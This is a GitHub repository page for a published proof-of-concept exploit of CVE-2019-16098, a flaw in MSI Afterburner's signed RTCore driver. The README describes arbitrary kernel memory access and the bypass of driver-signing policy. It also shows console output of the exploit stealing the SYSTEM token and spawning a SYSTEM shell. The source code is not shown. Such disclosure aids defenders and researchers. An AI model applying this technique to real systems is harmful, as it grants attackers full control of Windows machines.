Skip to content
Local privilege escalation PoC exploit for CVE-2019-16098
C++ CMake
Branch: master
Clone or download
Fetching latest commit…
Cannot retrieve the latest commit at this time.
Permalink
Type Name Latest commit message Commit time
Failed to load latest commit information.
.gitignore Publish CVE-2019-16098 PoC exploit Sep 10, 2019
CMakeLists.txt Publish CVE-2019-16098 PoC exploit Sep 10, 2019
CMakeSettings.json
CVE-2019-16098.cpp Fix memory offset Sep 10, 2019
README.md Update README.md Sep 13, 2019

README.md

CVE-2019-16098

The driver in Micro-Star MSI Afterburner 4.6.2.15658 (aka RTCore64.sys and RTCore32.sys) allows any authenticated user to read and write to arbitrary memory, I/O ports, and MSRs. This can be exploited for privilege escalation, code execution under high privileges, and information disclosure. These signed drivers can also be used to bypass the Microsoft driver-signing policy to deploy malicious code.

For more updates, visit CVE-2019-16098

WARNING: Hardcoded Windows 10 x64 Version 1903 offsets!

Microsoft Windows [Version 10.0.18362.295]
(c) 2019 Microsoft Corporation. All rights reserved.

C:\Users\Barakat\source\repos\CVE-2019-16098>whoami
Barakat

C:\Users\Barakat\source\repos\CVE-2019-16098>out\build\x64-Debug\CVE-2019-16098.exe
[*] Device object handle has been obtained
[*] Ntoskrnl base address: FFFFF80734200000
[*] PsInitialSystemProcess address: FFFFC288A607F300
[*] System process token: FFFF9703A9E061B0
[*] Current process address: FFFFC288B7959400
[*] Current process token: FFFF9703B9D785F0
[*] Stealing System process token ...
[*] Spawning new shell ...
Microsoft Windows [Version 10.0.18362.295]
(c) 2019 Microsoft Corporation. All rights reserved.

C:\Users\Barakat\source\repos\CVE-2019-16098>whoami
SYSTEM

C:\Users\Barakat\source\repos\CVE-2019-16098>
You can’t perform that action at this time.